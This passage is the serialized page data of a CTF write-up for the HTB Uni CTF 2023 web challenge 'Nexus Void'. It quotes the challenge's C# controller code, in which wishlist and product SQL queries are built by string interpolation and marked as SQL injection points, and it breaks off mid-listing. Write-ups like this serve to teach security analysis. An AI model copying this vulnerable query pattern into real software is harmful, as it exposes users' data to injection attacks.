[{"data":1,"prerenderedAt":5344},["ShallowReactive",2],{"content-query-alNqsrA1jm":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":5338,"_id":5339,"_source":5340,"_file":5341,"_stem":5342,"_extension":5343},"/writeups/nexus-void","writeups",false,"","Nexus Void",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"Writeup of Nexus Void, a medium web challenge from the HTB Uni CTF 2023. It is about SQL injection and deserialization.","web,sqli,deserialization","nexus-void","https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230872/writeups/htb-uni-2023.webp","2023-12-07",[16,17,19,20,22,24,25,26],{"og:image":13},{"og:title":18},"Nexus Void writeup",{"og:description":10},{"og:type":21},"article",{"og:url":23},"https://owalid.com/nexus-void",{"description":10},{"title":18},{"keywords":27},"web,sqli,deserialization,htb,ctf,writeup",{"type":29,"children":30,"toc":5332},"root",[31,38,45,51,57,63,68,73,1691,1696,1702,1707,1712,2131,2136,2800,2809,2816,2821,2826,2831,2836,2841,2846,2851,2856,3512,3517,3529,3535,3540,3553,3724,3729,3740,3760,3770,3775,3788,4237,4250,4969,4981,4986,4992,4997,5004,5016,5021,5118,5123,5129,5148,5159,5165,5170,5175,5179,5184,5188,5193,5197,5209,5278,5290,5295,5304,5308,5313,5317,5322,5326],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49],{"type":37,"value":50},"Nexus Void is a medium web challenge from the HTB Uni CTF 2023. It is about SQL injection and deserialization. 
The code is written in C# and the database is SQLite.",{"type":32,"tag":52,"props":53,"children":56},"custom-image",{"imgSrc":54,":width":55},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704402027/writeups/nexus-void/architecture_challenge.webp","300",[],{"type":32,"tag":39,"props":58,"children":60},{"id":59},"sqli",[61],{"type":37,"value":62},"Sqli",{"type":32,"tag":46,"props":64,"children":65},{},[66],{"type":37,"value":67},"If we read the source code carefully, we can see that no query to the database is protected: the values are interpolated directly into the SQL strings instead of being passed as parameters. They are all vulnerable to SQL injection.",{"type":32,"tag":46,"props":69,"children":70},{},[71],{"type":37,"value":72},"Some examples are shown below:",{"type":32,"tag":74,"props":75,"children":77},"code-card",{"lang":76},"csharp",[78],{"type":32,"tag":79,"props":80,"children":83},"pre",{"code":81,"language":76,"meta":7,"className":82,"style":7},"// Controllers/HomeController.cs\npublic IActionResult Wishlist()\n{\n    string ID = HttpContext.Items[\"ID\"].ToString();\n    string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\"; // \u003C--- SQLI\n\n    [...]\n}\n[...]\n\npublic IActionResult Wishlist(string name, string sellerName)\n{\n    string ID = HttpContext.Items[\"ID\"].ToString();\n    string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID={ID}\"; // \u003C--- SQLI\n    var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n    string sqlQueryProduct = $\"SELECT * from Products WHERE name='{name}' AND sellerName='{sellerName}'\"; // \u003C--- SQLI\n    var product = _db.Products.FromSqlRaw(sqlQueryProduct).FirstOrDefault();\n    if(!string.IsNullOrEmpty(product.name))\n    {\n        if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n        {\n            List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n            ProductModel result = products.Find(x => x.name == product.name);\n\n            if (result != null)\n            {\n             
   return Content(\"Product already exists\");\n            }\n\n            products.Add(product);\n            string serializedData = SerializeHelper.Serialize(products);\n            string sqlQueryAddWishlist = $\"UPDATE Wishlist SET data='{serializedData}' WHERE ID={ID}\"; // \u003C--- SQLI\n            _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n        }\n        else\n        {\n            string username = HttpContext.Items[\"username\"].ToString();\n            List\u003CProductModel> wishListProducts = new List\u003CProductModel>();\n            wishListProducts.Add(product);\n            string serializedData = SerializeHelper.Serialize(wishListProducts);\n            string sqlQueryAddWishlist = $\"INSERT INTO Wishlist(ID, username, data) VALUES({ID},'{username}', '{serializedData}')\"; // \u003C--- SQLI\n            _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n        }\n        return Content(\"Added\");\n    }\n    return Content(\"Invalid\");\n}\n","language-csharp shiki shiki-themes vitesse-dark",[84],{"type":32,"tag":85,"props":86,"children":87},"code",{"__ignoreMap":7},[88,100,128,137,209,269,279,303,312,329,337,388,396,452,501,565,638,697,750,759,831,840,908,987,995,1025,1034,1069,1078,1086,1116,1160,1228,1268,1277,1286,1294,1352,1404,1433,1474,1562,1598,1606,1640,1649,1683],{"type":32,"tag":89,"props":90,"children":93},"span",{"class":91,"line":92},"line",1,[94],{"type":32,"tag":89,"props":95,"children":97},{"style":96},"--shiki-default:#758575DD",[98],{"type":37,"value":99},"// Controllers/HomeController.cs\n",{"type":32,"tag":89,"props":101,"children":103},{"class":91,"line":102},2,[104,110,116,122],{"type":32,"tag":89,"props":105,"children":107},{"style":106},"--shiki-default:#CB7676",[108],{"type":37,"value":109},"public",{"type":32,"tag":89,"props":111,"children":113},{"style":112},"--shiki-default:#5DA994",[114],{"type":37,"value":115}," 
IActionResult",{"type":32,"tag":89,"props":117,"children":119},{"style":118},"--shiki-default:#80A665",[120],{"type":37,"value":121}," Wishlist",{"type":32,"tag":89,"props":123,"children":125},{"style":124},"--shiki-default:#666666",[126],{"type":37,"value":127},"()\n",{"type":32,"tag":89,"props":129,"children":131},{"class":91,"line":130},3,[132],{"type":32,"tag":89,"props":133,"children":134},{"style":124},[135],{"type":37,"value":136},"{\n",{"type":32,"tag":89,"props":138,"children":140},{"class":91,"line":139},4,[141,147,152,157,163,168,173,178,184,190,194,199,204],{"type":32,"tag":89,"props":142,"children":144},{"style":143},"--shiki-default:#4D9375",[145],{"type":37,"value":146},"    string",{"type":32,"tag":89,"props":148,"children":149},{"style":118},[150],{"type":37,"value":151}," ID",{"type":32,"tag":89,"props":153,"children":154},{"style":124},[155],{"type":37,"value":156}," =",{"type":32,"tag":89,"props":158,"children":160},{"style":159},"--shiki-default:#BD976A",[161],{"type":37,"value":162}," 
HttpContext",{"type":32,"tag":89,"props":164,"children":165},{"style":124},[166],{"type":37,"value":167},".",{"type":32,"tag":89,"props":169,"children":170},{"style":159},[171],{"type":37,"value":172},"Items",{"type":32,"tag":89,"props":174,"children":175},{"style":124},[176],{"type":37,"value":177},"[",{"type":32,"tag":89,"props":179,"children":181},{"style":180},"--shiki-default:#C98A7D77",[182],{"type":37,"value":183},"\"",{"type":32,"tag":89,"props":185,"children":187},{"style":186},"--shiki-default:#C98A7D",[188],{"type":37,"value":189},"ID",{"type":32,"tag":89,"props":191,"children":192},{"style":180},[193],{"type":37,"value":183},{"type":32,"tag":89,"props":195,"children":196},{"style":124},[197],{"type":37,"value":198},"].",{"type":32,"tag":89,"props":200,"children":201},{"style":118},[202],{"type":37,"value":203},"ToString",{"type":32,"tag":89,"props":205,"children":206},{"style":124},[207],{"type":37,"value":208},"();\n",{"type":32,"tag":89,"props":210,"children":212},{"class":91,"line":211},5,[213,217,222,226,231,236,241,245,250,255,259,264],{"type":32,"tag":89,"props":214,"children":215},{"style":143},[216],{"type":37,"value":146},{"type":32,"tag":89,"props":218,"children":219},{"style":118},[220],{"type":37,"value":221}," sqlQueryGetWishlist",{"type":32,"tag":89,"props":223,"children":224},{"style":124},[225],{"type":37,"value":156},{"type":32,"tag":89,"props":227,"children":228},{"style":180},[229],{"type":37,"value":230}," $\"",{"type":32,"tag":89,"props":232,"children":233},{"style":186},[234],{"type":37,"value":235},"SELECT * from Wishlist WHERE 
ID='",{"type":32,"tag":89,"props":237,"children":238},{"style":124},[239],{"type":37,"value":240},"{",{"type":32,"tag":89,"props":242,"children":243},{"style":186},[244],{"type":37,"value":189},{"type":32,"tag":89,"props":246,"children":247},{"style":124},[248],{"type":37,"value":249},"}",{"type":32,"tag":89,"props":251,"children":252},{"style":186},[253],{"type":37,"value":254},"'",{"type":32,"tag":89,"props":256,"children":257},{"style":180},[258],{"type":37,"value":183},{"type":32,"tag":89,"props":260,"children":261},{"style":124},[262],{"type":37,"value":263},";",{"type":32,"tag":89,"props":265,"children":266},{"style":96},[267],{"type":37,"value":268}," // \u003C--- SQLI\n",{"type":32,"tag":89,"props":270,"children":272},{"class":91,"line":271},6,[273],{"type":32,"tag":89,"props":274,"children":276},{"emptyLinePlaceholder":275},true,[277],{"type":37,"value":278},"\n",{"type":32,"tag":89,"props":280,"children":282},{"class":91,"line":281},7,[283,288,293,298],{"type":32,"tag":89,"props":284,"children":285},{"style":124},[286],{"type":37,"value":287},"    
[",{"type":32,"tag":89,"props":289,"children":290},{"style":106},[291],{"type":37,"value":292},"..",{"type":32,"tag":89,"props":294,"children":296},{"style":295},"--shiki-default:#DBD7CAEE",[297],{"type":37,"value":167},{"type":32,"tag":89,"props":299,"children":300},{"style":124},[301],{"type":37,"value":302},"]\n",{"type":32,"tag":89,"props":304,"children":306},{"class":91,"line":305},8,[307],{"type":32,"tag":89,"props":308,"children":309},{"style":124},[310],{"type":37,"value":311},"}\n",{"type":32,"tag":89,"props":313,"children":315},{"class":91,"line":314},9,[316,320,325],{"type":32,"tag":89,"props":317,"children":318},{"style":124},[319],{"type":37,"value":177},{"type":32,"tag":89,"props":321,"children":322},{"style":295},[323],{"type":37,"value":324},"...",{"type":32,"tag":89,"props":326,"children":327},{"style":124},[328],{"type":37,"value":302},{"type":32,"tag":89,"props":330,"children":332},{"class":91,"line":331},10,[333],{"type":32,"tag":89,"props":334,"children":335},{"emptyLinePlaceholder":275},[336],{"type":37,"value":278},{"type":32,"tag":89,"props":338,"children":340},{"class":91,"line":339},11,[341,345,349,353,358,363,368,373,378,383],{"type":32,"tag":89,"props":342,"children":343},{"style":106},[344],{"type":37,"value":109},{"type":32,"tag":89,"props":346,"children":347},{"style":112},[348],{"type":37,"value":115},{"type":32,"tag":89,"props":350,"children":351},{"style":118},[352],{"type":37,"value":121},{"type":32,"tag":89,"props":354,"children":355},{"style":124},[356],{"type":37,"value":357},"(",{"type":32,"tag":89,"props":359,"children":360},{"style":143},[361],{"type":37,"value":362},"string",{"type":32,"tag":89,"props":364,"children":365},{"style":118},[366],{"type":37,"value":367}," name",{"type":32,"tag":89,"props":369,"children":370},{"style":124},[371],{"type":37,"value":372},",",{"type":32,"tag":89,"props":374,"children":375},{"style":143},[376],{"type":37,"value":377}," 
string",{"type":32,"tag":89,"props":379,"children":380},{"style":118},[381],{"type":37,"value":382}," sellerName",{"type":32,"tag":89,"props":384,"children":385},{"style":124},[386],{"type":37,"value":387},")\n",{"type":32,"tag":89,"props":389,"children":391},{"class":91,"line":390},12,[392],{"type":32,"tag":89,"props":393,"children":394},{"style":124},[395],{"type":37,"value":136},{"type":32,"tag":89,"props":397,"children":399},{"class":91,"line":398},13,[400,404,408,412,416,420,424,428,432,436,440,444,448],{"type":32,"tag":89,"props":401,"children":402},{"style":143},[403],{"type":37,"value":146},{"type":32,"tag":89,"props":405,"children":406},{"style":118},[407],{"type":37,"value":151},{"type":32,"tag":89,"props":409,"children":410},{"style":124},[411],{"type":37,"value":156},{"type":32,"tag":89,"props":413,"children":414},{"style":159},[415],{"type":37,"value":162},{"type":32,"tag":89,"props":417,"children":418},{"style":124},[419],{"type":37,"value":167},{"type":32,"tag":89,"props":421,"children":422},{"style":159},[423],{"type":37,"value":172},{"type":32,"tag":89,"props":425,"children":426},{"style":124},[427],{"type":37,"value":177},{"type":32,"tag":89,"props":429,"children":430},{"style":180},[431],{"type":37,"value":183},{"type":32,"tag":89,"props":433,"children":434},{"style":186},[435],{"type":37,"value":189},{"type":32,"tag":89,"props":437,"children":438},{"style":180},[439],{"type":37,"value":183},{"type":32,"tag":89,"props":441,"children":442},{"style":124},[443],{"type":37,"value":198},{"type":32,"tag":89,"props":445,"children":446},{"style":118},[447],{"type":37,"value":203},{"type":32,"tag":89,"props":449,"children":450},{"style":124},[451],{"type":37,"value":208},{"type":32,"tag":89,"props":453,"children":455},{"class":91,"line":454},14,[456,460,464,468,472,477,481,485,489,493,497],{"type":32,"tag":89,"props":457,"children":458},{"style":143},[459],{"type":37,"value":146},{"type":32,"tag":89,"props":461,"children":462},{"style":118},[463],{"type":3
7,"value":221},{"type":32,"tag":89,"props":465,"children":466},{"style":124},[467],{"type":37,"value":156},{"type":32,"tag":89,"props":469,"children":470},{"style":180},[471],{"type":37,"value":230},{"type":32,"tag":89,"props":473,"children":474},{"style":186},[475],{"type":37,"value":476},"SELECT * from Wishlist WHERE ID=",{"type":32,"tag":89,"props":478,"children":479},{"style":124},[480],{"type":37,"value":240},{"type":32,"tag":89,"props":482,"children":483},{"style":186},[484],{"type":37,"value":189},{"type":32,"tag":89,"props":486,"children":487},{"style":124},[488],{"type":37,"value":249},{"type":32,"tag":89,"props":490,"children":491},{"style":180},[492],{"type":37,"value":183},{"type":32,"tag":89,"props":494,"children":495},{"style":124},[496],{"type":37,"value":263},{"type":32,"tag":89,"props":498,"children":499},{"style":96},[500],{"type":37,"value":268},{"type":32,"tag":89,"props":502,"children":504},{"class":91,"line":503},15,[505,510,515,519,524,528,533,537,542,546,551,556,561],{"type":32,"tag":89,"props":506,"children":507},{"style":106},[508],{"type":37,"value":509},"    var",{"type":32,"tag":89,"props":511,"children":512},{"style":118},[513],{"type":37,"value":514}," wishlist",{"type":32,"tag":89,"props":516,"children":517},{"style":124},[518],{"type":37,"value":156},{"type":32,"tag":89,"props":520,"children":521},{"style":159},[522],{"type":37,"value":523}," 
_db",{"type":32,"tag":89,"props":525,"children":526},{"style":124},[527],{"type":37,"value":167},{"type":32,"tag":89,"props":529,"children":530},{"style":159},[531],{"type":37,"value":532},"Wishlist",{"type":32,"tag":89,"props":534,"children":535},{"style":124},[536],{"type":37,"value":167},{"type":32,"tag":89,"props":538,"children":539},{"style":118},[540],{"type":37,"value":541},"FromSqlRaw",{"type":32,"tag":89,"props":543,"children":544},{"style":124},[545],{"type":37,"value":357},{"type":32,"tag":89,"props":547,"children":548},{"style":159},[549],{"type":37,"value":550},"sqlQueryGetWishlist",{"type":32,"tag":89,"props":552,"children":553},{"style":124},[554],{"type":37,"value":555},").",{"type":32,"tag":89,"props":557,"children":558},{"style":118},[559],{"type":37,"value":560},"FirstOrDefault",{"type":32,"tag":89,"props":562,"children":563},{"style":124},[564],{"type":37,"value":208},{"type":32,"tag":89,"props":566,"children":568},{"class":91,"line":567},16,[569,573,578,582,586,591,595,600,604,609,613,618,622,626,630,634],{"type":32,"tag":89,"props":570,"children":571},{"style":143},[572],{"type":37,"value":146},{"type":32,"tag":89,"props":574,"children":575},{"style":118},[576],{"type":37,"value":577}," sqlQueryProduct",{"type":32,"tag":89,"props":579,"children":580},{"style":124},[581],{"type":37,"value":156},{"type":32,"tag":89,"props":583,"children":584},{"style":180},[585],{"type":37,"value":230},{"type":32,"tag":89,"props":587,"children":588},{"style":186},[589],{"type":37,"value":590},"SELECT * from Products WHERE name='",{"type":32,"tag":89,"props":592,"children":593},{"style":124},[594],{"type":37,"value":240},{"type":32,"tag":89,"props":596,"children":597},{"style":186},[598],{"type":37,"value":599},"name",{"type":32,"tag":89,"props":601,"children":602},{"style":124},[603],{"type":37,"value":249},{"type":32,"tag":89,"props":605,"children":606},{"style":186},[607],{"type":37,"value":608},"' AND 
sellerName='",{"type":32,"tag":89,"props":610,"children":611},{"style":124},[612],{"type":37,"value":240},{"type":32,"tag":89,"props":614,"children":615},{"style":186},[616],{"type":37,"value":617},"sellerName",{"type":32,"tag":89,"props":619,"children":620},{"style":124},[621],{"type":37,"value":249},{"type":32,"tag":89,"props":623,"children":624},{"style":186},[625],{"type":37,"value":254},{"type":32,"tag":89,"props":627,"children":628},{"style":180},[629],{"type":37,"value":183},{"type":32,"tag":89,"props":631,"children":632},{"style":124},[633],{"type":37,"value":263},{"type":32,"tag":89,"props":635,"children":636},{"style":96},[637],{"type":37,"value":268},{"type":32,"tag":89,"props":639,"children":641},{"class":91,"line":640},17,[642,646,651,655,659,663,668,672,676,680,685,689,693],{"type":32,"tag":89,"props":643,"children":644},{"style":106},[645],{"type":37,"value":509},{"type":32,"tag":89,"props":647,"children":648},{"style":118},[649],{"type":37,"value":650}," product",{"type":32,"tag":89,"props":652,"children":653},{"style":124},[654],{"type":37,"value":156},{"type":32,"tag":89,"props":656,"children":657},{"style":159},[658],{"type":37,"value":523},{"type":32,"tag":89,"props":660,"children":661},{"style":124},[662],{"type":37,"value":167},{"type":32,"tag":89,"props":664,"children":665},{"style":159},[666],{"type":37,"value":667},"Products",{"type":32,"tag":89,"props":669,"children":670},{"style":124},[671],{"type":37,"value":167},{"type":32,"tag":89,"props":673,"children":674},{"style":118},[675],{"type":37,"value":541},{"type":32,"tag":89,"props":677,"children":678},{"style":124},[679],{"type":37,"value":357},{"type":32,"tag":89,"props":681,"children":682},{"style":159},[683],{"type":37,"value":684},"sqlQueryProduct",{"type":32,"tag":89,"props":686,"children":687},{"style":124},[688],{"type":37,"value":555},{"type":32,"tag":89,"props":690,"children":691},{"style":118},[692],{"type":37,"value":560},{"type":32,"tag":89,"props":694,"children":695},{"style":
124},[696],{"type":37,"value":208},{"type":32,"tag":89,"props":698,"children":700},{"class":91,"line":699},18,[701,706,710,715,719,723,728,732,737,741,745],{"type":32,"tag":89,"props":702,"children":703},{"style":143},[704],{"type":37,"value":705},"    if",{"type":32,"tag":89,"props":707,"children":708},{"style":124},[709],{"type":37,"value":357},{"type":32,"tag":89,"props":711,"children":712},{"style":106},[713],{"type":37,"value":714},"!",{"type":32,"tag":89,"props":716,"children":717},{"style":143},[718],{"type":37,"value":362},{"type":32,"tag":89,"props":720,"children":721},{"style":124},[722],{"type":37,"value":167},{"type":32,"tag":89,"props":724,"children":725},{"style":118},[726],{"type":37,"value":727},"IsNullOrEmpty",{"type":32,"tag":89,"props":729,"children":730},{"style":124},[731],{"type":37,"value":357},{"type":32,"tag":89,"props":733,"children":734},{"style":159},[735],{"type":37,"value":736},"product",{"type":32,"tag":89,"props":738,"children":739},{"style":124},[740],{"type":37,"value":167},{"type":32,"tag":89,"props":742,"children":743},{"style":159},[744],{"type":37,"value":599},{"type":32,"tag":89,"props":746,"children":747},{"style":124},[748],{"type":37,"value":749},"))\n",{"type":32,"tag":89,"props":751,"children":753},{"class":91,"line":752},19,[754],{"type":32,"tag":89,"props":755,"children":756},{"style":124},[757],{"type":37,"value":758},"    {\n",{"type":32,"tag":89,"props":760,"children":762},{"class":91,"line":761},20,[763,768,773,778,783,788,793,798,802,806,810,814,818,822,827],{"type":32,"tag":89,"props":764,"children":765},{"style":143},[766],{"type":37,"value":767},"        if",{"type":32,"tag":89,"props":769,"children":770},{"style":124},[771],{"type":37,"value":772}," (",{"type":32,"tag":89,"props":774,"children":775},{"style":159},[776],{"type":37,"value":777},"wishlist",{"type":32,"tag":89,"props":779,"children":780},{"style":106},[781],{"type":37,"value":782}," 
!=",{"type":32,"tag":89,"props":784,"children":785},{"style":106},[786],{"type":37,"value":787}," null",{"type":32,"tag":89,"props":789,"children":790},{"style":106},[791],{"type":37,"value":792}," &&",{"type":32,"tag":89,"props":794,"children":795},{"style":106},[796],{"type":37,"value":797}," !",{"type":32,"tag":89,"props":799,"children":800},{"style":143},[801],{"type":37,"value":362},{"type":32,"tag":89,"props":803,"children":804},{"style":124},[805],{"type":37,"value":167},{"type":32,"tag":89,"props":807,"children":808},{"style":118},[809],{"type":37,"value":727},{"type":32,"tag":89,"props":811,"children":812},{"style":124},[813],{"type":37,"value":357},{"type":32,"tag":89,"props":815,"children":816},{"style":159},[817],{"type":37,"value":777},{"type":32,"tag":89,"props":819,"children":820},{"style":124},[821],{"type":37,"value":167},{"type":32,"tag":89,"props":823,"children":824},{"style":159},[825],{"type":37,"value":826},"data",{"type":32,"tag":89,"props":828,"children":829},{"style":124},[830],{"type":37,"value":749},{"type":32,"tag":89,"props":832,"children":834},{"class":91,"line":833},21,[835],{"type":32,"tag":89,"props":836,"children":837},{"style":124},[838],{"type":37,"value":839},"        {\n",{"type":32,"tag":89,"props":841,"children":843},{"class":91,"line":842},22,[844,849,854,859,864,869,873,878,882,887,891,895,899,903],{"type":32,"tag":89,"props":845,"children":846},{"style":112},[847],{"type":37,"value":848},"            List",{"type":32,"tag":89,"props":850,"children":851},{"style":124},[852],{"type":37,"value":853},"\u003C",{"type":32,"tag":89,"props":855,"children":856},{"style":112},[857],{"type":37,"value":858},"ProductModel",{"type":32,"tag":89,"props":860,"children":861},{"style":124},[862],{"type":37,"value":863},">",{"type":32,"tag":89,"props":865,"children":866},{"style":118},[867],{"type":37,"value":868}," 
products",{"type":32,"tag":89,"props":870,"children":871},{"style":124},[872],{"type":37,"value":156},{"type":32,"tag":89,"props":874,"children":875},{"style":159},[876],{"type":37,"value":877}," SerializeHelper",{"type":32,"tag":89,"props":879,"children":880},{"style":124},[881],{"type":37,"value":167},{"type":32,"tag":89,"props":883,"children":884},{"style":118},[885],{"type":37,"value":886},"Deserialize",{"type":32,"tag":89,"props":888,"children":889},{"style":124},[890],{"type":37,"value":357},{"type":32,"tag":89,"props":892,"children":893},{"style":159},[894],{"type":37,"value":777},{"type":32,"tag":89,"props":896,"children":897},{"style":124},[898],{"type":37,"value":167},{"type":32,"tag":89,"props":900,"children":901},{"style":159},[902],{"type":37,"value":826},{"type":32,"tag":89,"props":904,"children":905},{"style":124},[906],{"type":37,"value":907},");\n",{"type":32,"tag":89,"props":909,"children":911},{"class":91,"line":910},23,[912,917,922,926,930,934,939,943,948,953,958,962,966,971,975,979,983],{"type":32,"tag":89,"props":913,"children":914},{"style":112},[915],{"type":37,"value":916},"            ProductModel",{"type":32,"tag":89,"props":918,"children":919},{"style":118},[920],{"type":37,"value":921}," result",{"type":32,"tag":89,"props":923,"children":924},{"style":124},[925],{"type":37,"value":156},{"type":32,"tag":89,"props":927,"children":928},{"style":159},[929],{"type":37,"value":868},{"type":32,"tag":89,"props":931,"children":932},{"style":124},[933],{"type":37,"value":167},{"type":32,"tag":89,"props":935,"children":936},{"style":118},[937],{"type":37,"value":938},"Find",{"type":32,"tag":89,"props":940,"children":941},{"style":124},[942],{"type":37,"value":357},{"type":32,"tag":89,"props":944,"children":945},{"style":118},[946],{"type":37,"value":947},"x",{"type":32,"tag":89,"props":949,"children":950},{"style":106},[951],{"type":37,"value":952}," =>",{"type":32,"tag":89,"props":954,"children":955},{"style":159},[956],{"type":37,"value":957}," 
x",{"type":32,"tag":89,"props":959,"children":960},{"style":124},[961],{"type":37,"value":167},{"type":32,"tag":89,"props":963,"children":964},{"style":159},[965],{"type":37,"value":599},{"type":32,"tag":89,"props":967,"children":968},{"style":106},[969],{"type":37,"value":970}," ==",{"type":32,"tag":89,"props":972,"children":973},{"style":159},[974],{"type":37,"value":650},{"type":32,"tag":89,"props":976,"children":977},{"style":124},[978],{"type":37,"value":167},{"type":32,"tag":89,"props":980,"children":981},{"style":159},[982],{"type":37,"value":599},{"type":32,"tag":89,"props":984,"children":985},{"style":124},[986],{"type":37,"value":907},{"type":32,"tag":89,"props":988,"children":990},{"class":91,"line":989},24,[991],{"type":32,"tag":89,"props":992,"children":993},{"emptyLinePlaceholder":275},[994],{"type":37,"value":278},{"type":32,"tag":89,"props":996,"children":998},{"class":91,"line":997},25,[999,1004,1008,1013,1017,1021],{"type":32,"tag":89,"props":1000,"children":1001},{"style":143},[1002],{"type":37,"value":1003},"            if",{"type":32,"tag":89,"props":1005,"children":1006},{"style":124},[1007],{"type":37,"value":772},{"type":32,"tag":89,"props":1009,"children":1010},{"style":159},[1011],{"type":37,"value":1012},"result",{"type":32,"tag":89,"props":1014,"children":1015},{"style":106},[1016],{"type":37,"value":782},{"type":32,"tag":89,"props":1018,"children":1019},{"style":106},[1020],{"type":37,"value":787},{"type":32,"tag":89,"props":1022,"children":1023},{"style":124},[1024],{"type":37,"value":387},{"type":32,"tag":89,"props":1026,"children":1028},{"class":91,"line":1027},26,[1029],{"type":32,"tag":89,"props":1030,"children":1031},{"style":124},[1032],{"type":37,"value":1033},"            {\n",{"type":32,"tag":89,"props":1035,"children":1037},{"class":91,"line":1036},27,[1038,1043,1048,1052,1056,1061,1065],{"type":32,"tag":89,"props":1039,"children":1040},{"style":143},[1041],{"type":37,"value":1042},"                
return",{"type":32,"tag":89,"props":1044,"children":1045},{"style":118},[1046],{"type":37,"value":1047}," Content",{"type":32,"tag":89,"props":1049,"children":1050},{"style":124},[1051],{"type":37,"value":357},{"type":32,"tag":89,"props":1053,"children":1054},{"style":180},[1055],{"type":37,"value":183},{"type":32,"tag":89,"props":1057,"children":1058},{"style":186},[1059],{"type":37,"value":1060},"Product already exists",{"type":32,"tag":89,"props":1062,"children":1063},{"style":180},[1064],{"type":37,"value":183},{"type":32,"tag":89,"props":1066,"children":1067},{"style":124},[1068],{"type":37,"value":907},{"type":32,"tag":89,"props":1070,"children":1072},{"class":91,"line":1071},28,[1073],{"type":32,"tag":89,"props":1074,"children":1075},{"style":124},[1076],{"type":37,"value":1077},"            }\n",{"type":32,"tag":89,"props":1079,"children":1081},{"class":91,"line":1080},29,[1082],{"type":32,"tag":89,"props":1083,"children":1084},{"emptyLinePlaceholder":275},[1085],{"type":37,"value":278},{"type":32,"tag":89,"props":1087,"children":1089},{"class":91,"line":1088},30,[1090,1095,1099,1104,1108,1112],{"type":32,"tag":89,"props":1091,"children":1092},{"style":159},[1093],{"type":37,"value":1094},"            products",{"type":32,"tag":89,"props":1096,"children":1097},{"style":124},[1098],{"type":37,"value":167},{"type":32,"tag":89,"props":1100,"children":1101},{"style":118},[1102],{"type":37,"value":1103},"Add",{"type":32,"tag":89,"props":1105,"children":1106},{"style":124},[1107],{"type":37,"value":357},{"type":32,"tag":89,"props":1109,"children":1110},{"style":159},[1111],{"type":37,"value":736},{"type":32,"tag":89,"props":1113,"children":1114},{"style":124},[1115],{"type":37,"value":907},{"type":32,"tag":89,"props":1117,"children":1119},{"class":91,"line":1118},31,[1120,1125,1130,1134,1138,1142,1147,1151,1156],{"type":32,"tag":89,"props":1121,"children":1122},{"style":143},[1123],{"type":37,"value":1124},"            
string",{"type":32,"tag":89,"props":1126,"children":1127},{"style":118},[1128],{"type":37,"value":1129}," serializedData",{"type":32,"tag":89,"props":1131,"children":1132},{"style":124},[1133],{"type":37,"value":156},{"type":32,"tag":89,"props":1135,"children":1136},{"style":159},[1137],{"type":37,"value":877},{"type":32,"tag":89,"props":1139,"children":1140},{"style":124},[1141],{"type":37,"value":167},{"type":32,"tag":89,"props":1143,"children":1144},{"style":118},[1145],{"type":37,"value":1146},"Serialize",{"type":32,"tag":89,"props":1148,"children":1149},{"style":124},[1150],{"type":37,"value":357},{"type":32,"tag":89,"props":1152,"children":1153},{"style":159},[1154],{"type":37,"value":1155},"products",{"type":32,"tag":89,"props":1157,"children":1158},{"style":124},[1159],{"type":37,"value":907},{"type":32,"tag":89,"props":1161,"children":1163},{"class":91,"line":1162},32,[1164,1168,1173,1177,1181,1186,1190,1195,1199,1204,1208,1212,1216,1220,1224],{"type":32,"tag":89,"props":1165,"children":1166},{"style":143},[1167],{"type":37,"value":1124},{"type":32,"tag":89,"props":1169,"children":1170},{"style":118},[1171],{"type":37,"value":1172}," sqlQueryAddWishlist",{"type":32,"tag":89,"props":1174,"children":1175},{"style":124},[1176],{"type":37,"value":156},{"type":32,"tag":89,"props":1178,"children":1179},{"style":180},[1180],{"type":37,"value":230},{"type":32,"tag":89,"props":1182,"children":1183},{"style":186},[1184],{"type":37,"value":1185},"UPDATE Wishlist SET data='",{"type":32,"tag":89,"props":1187,"children":1188},{"style":124},[1189],{"type":37,"value":240},{"type":32,"tag":89,"props":1191,"children":1192},{"style":186},[1193],{"type":37,"value":1194},"serializedData",{"type":32,"tag":89,"props":1196,"children":1197},{"style":124},[1198],{"type":37,"value":249},{"type":32,"tag":89,"props":1200,"children":1201},{"style":186},[1202],{"type":37,"value":1203},"' WHERE 
ID=",{"type":32,"tag":89,"props":1205,"children":1206},{"style":124},[1207],{"type":37,"value":240},{"type":32,"tag":89,"props":1209,"children":1210},{"style":186},[1211],{"type":37,"value":189},{"type":32,"tag":89,"props":1213,"children":1214},{"style":124},[1215],{"type":37,"value":249},{"type":32,"tag":89,"props":1217,"children":1218},{"style":180},[1219],{"type":37,"value":183},{"type":32,"tag":89,"props":1221,"children":1222},{"style":124},[1223],{"type":37,"value":263},{"type":32,"tag":89,"props":1225,"children":1226},{"style":96},[1227],{"type":37,"value":268},{"type":32,"tag":89,"props":1229,"children":1231},{"class":91,"line":1230},33,[1232,1237,1241,1246,1250,1255,1259,1264],{"type":32,"tag":89,"props":1233,"children":1234},{"style":159},[1235],{"type":37,"value":1236},"            